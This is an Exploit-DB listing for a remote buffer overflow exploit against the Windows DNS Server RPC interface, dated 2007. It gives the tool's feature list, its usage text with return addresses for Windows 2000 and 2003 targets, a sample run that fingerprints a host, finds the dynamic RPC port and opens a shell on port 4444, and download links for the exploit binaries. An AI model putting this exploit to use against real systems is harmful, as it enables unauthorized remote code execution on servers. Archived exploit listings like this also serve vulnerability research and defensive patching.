Microsoft Windows - DNS RPC Remote Buffer Overflow (2)

EDB-ID:

3746




Platform:

Windows

Date:

2007-04-18


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

  Exploit v2 features:
  - Target Remote port 445 (by default but requires auth)
  - Manual target for dynamic tcp port (without auth)
  - Automatic search for dynamic dns rpc port
  - Local and remote OS fingerprinting (auto target)
  - Windows 2000 server and Windows 2003 server (Spanish) supported by default
  - Fixed bug with Windows 2003 Shellcode
  - Universal local exploit for Win2k (automatic search for opcodes)
  - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)
  - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)
  - Microsoft RPC api used ( who cares? :p )


D:\Programación\DNSTEST>dnstest
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

 Usage:   dnstest -h 127.0.0.1 (Universal local exploit)
          dnstest -h host [-t id] [-p port]
 Targets:
      0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)
      1 (0x79467ef8) - Win2k  server SP4 Spanish -   (default for win2k )
      2 (0x7c4fedbb) - Win2k  server SP4 English
      3 (0x7963edbb) - Win2k  server SP4 Italian
      4 (0x41414141) - Windows all Denial of Service


D:\Programación\DNSTEST>dnstest.exe -h 192.168.1.2
 --------------------------------------------------------------
 Microsoft Dns Server local & remote RPC Exploit code
 Exploit code by Andres Tarasco & Mario Ballano
 Tested against Windows 2000 server SP4 and Windows 2003 SP2
 --------------------------------------------------------------

[+] Trying to fingerprint target.. (05.02)
[+] Remote Host identified as Windows 2003
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp: 192.168.1.2
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]
[+] Dynamic DNS rpc port found (1105)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]
[+] RpcBindingFromStringBinding success
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444


also available at

http://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip
http://www.48bits.com/exploits/dnsxpl.v2.1.zip 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3746.zip (04172007-dnsxpl.v2.1.zip)

# milw0rm.com [2007-04-18]